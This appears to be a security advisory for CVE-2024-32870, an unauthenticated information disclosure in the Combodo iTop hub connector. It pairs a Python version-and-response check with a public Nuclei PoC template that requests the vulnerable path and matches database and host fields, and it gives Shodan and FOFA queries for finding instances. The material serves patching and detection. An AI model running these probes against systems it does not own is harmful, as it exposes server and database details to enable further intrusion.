CVE-2024-32870: iTop Hub Connector - Information Disclosure

Date: 2025-08-01 | Affected software: iTop Hub Connector | PoC: public

Vulnerability description

Combodo iTop is a simple, web-based IT Service Management tool. Server, OS, DBMS, PHP, and iTop information (name, version and parameters) can be read by anyone who can reach the iTop URI; no authentication is required. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
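The two questions a practitioner has to answer for this advisory are "is the installed version on a fixed branch?" and "does the hub-connector launch page answer unauthenticated with the disclosed fields?". The following Python helper, added here as an illustration and not part of the page or of Combodo's code, implements both: a branch-aware version check built from the four fixed versions named above, and a response check that mirrors the detection logic of the PoC template (HTTP 200 plus the `database_settings`, `database_version` and `instance_host` markers in the body). The exact layout of the disclosed page is not described in the advisory, so the sample body below is constructed, and `check_target` only reports which markers are present rather than parsing values out of it. Treating branches newer than 3.2 as fixed and unlisted older branches (2.6 and earlier) as unfixed is an assumption drawn from the patched-version list, not a statement from the advisory.

```python
"""Triage helper for CVE-2024-32870 (iTop hub connector information disclosure).

Added example; not code from the page or from Combodo. Network access is only
used by check_target(); the version and body checks work offline.
"""
import re
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Unauthenticated path exercised by the public PoC template.
HUB_PATH = ("/pages/exec.php?exec_module=itop-hub-connector"
            "&exec_page=launch.php&target=inform_after_setup")

# Body markers used by the PoC matcher (condition: and).
MARKERS = ("database_settings", "database_version", "instance_host")

# First fixed release per branch, from the advisory text.
FIXED = {
    (2, 7): (2, 7, 11),
    (3, 0): (3, 0, 5),
    (3, 1): (3, 1, 2),
    (3, 2): (3, 2, 0),
}


def parse_version(version: str) -> tuple:
    """Turn strings such as '3.1.1', '3.1.1-2' or 'iTop 2.7.10' into a 3-tuple.

    Only the first three numeric components matter for the fix comparison;
    packaging suffixes after them are ignored.
    """
    parts = [int(p) for p in re.findall(r"\d+", version)]
    if len(parts) < 2:
        raise ValueError(f"unrecognised iTop version string: {version!r}")
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def is_patched(version: str) -> bool:
    """True if `version` is at or above the fixed release of its branch.

    Assumption (not from the advisory): branches newer than 3.2 carry the
    fix, and unlisted older branches (2.6 and earlier) never received it.
    """
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v >= FIXED[branch]
    return branch > (3, 2)


def body_matches(status: int, body: str) -> bool:
    """Reproduce the PoC matcher: HTTP 200 and every marker present."""
    return status == 200 and all(m in body for m in MARKERS)


def missing_markers(body: str) -> list:
    """Which of the expected disclosure fields are absent (for triage notes)."""
    return [m for m in MARKERS if m not in body]


def check_target(base_url: str, timeout: float = 10.0) -> dict:
    """GET the hub-connector page without credentials and classify the result.

    Returns a dict with the status code, the matcher verdict and the markers
    that were not found. Exceptions from the network layer are reported in
    the 'error' key instead of being raised.
    """
    url = base_url.rstrip("/") + HUB_PATH
    req = Request(url, headers={"User-Agent": "cve-2024-32870-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as exc:             # non-2xx still yields a body worth reading
        status, body = exc.code, exc.read().decode("utf-8", "replace")
    except URLError as exc:
        return {"url": url, "error": str(exc.reason)}
    return {
        "url": url,
        "status": status,
        "vulnerable": body_matches(status, body),
        "missing_markers": missing_markers(body),
    }


# Constructed sample body (not captured from a real instance): it simply
# contains the three marker strings the PoC looks for.
SAMPLE_DISCLOSED_BODY = (
    "<input name='database_settings' ...><input name='database_version' ...>"
    "<input name='instance_host' ...>"
)

if __name__ == "__main__":
    for ver in ("2.7.10", "2.7.11", "3.1.1", "3.2.0"):
        print(ver, "patched" if is_patched(ver) else "VULNERABLE")
    print("constructed body matches PoC:", body_matches(200, SAMPLE_DISCLOSED_BODY))
```

Run `check_target("https://itop.example.org")` against your own instance from an unauthenticated context; a 200 with all three markers present is the same condition the PoC template reports on. A redirect to the login page, or a 200 whose body lacks the markers, indicates either a fixed version or an instance that does not expose the hub connector.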

PoC code [public]

id: CVE-2024-32870

info:
  name: iTop Hub Connector - Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    Combodo iTop is a simple, web-based IT Service Management tool. Server, OS, DBMS, PHP, and iTop information (name, version and parameters) can be read by anyone who can reach the iTop URI; no authentication is required. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
  remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
    - https://github.com/Combodo/iTop/security/advisories/GHSA-rfjh-2f5x-qxmx
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32870
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-32870
    cwe-id: CWE-200
    epss-score: 0.09011
    epss-percentile: 0.92311
    cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
  metadata:
    vendor: combodo
    product: itop
    shodan-query: html:"iTop login"
    fofa-query: body="iTop login"
  tags: cve,cve2024,itop,disclosure,unauth,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'database_settings'
          - 'database_version'
          - 'instance_host'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008e9fd164ebd67efdb3369d80b5766389ce81cbc47344e320bf639193d1a9efbc022100b5043ab691fae69e3d6bc0f89bf3b2eb9c76e9aac75d9a45c69318d7d54893d8:922c64590222798bb761d5b6d8e72950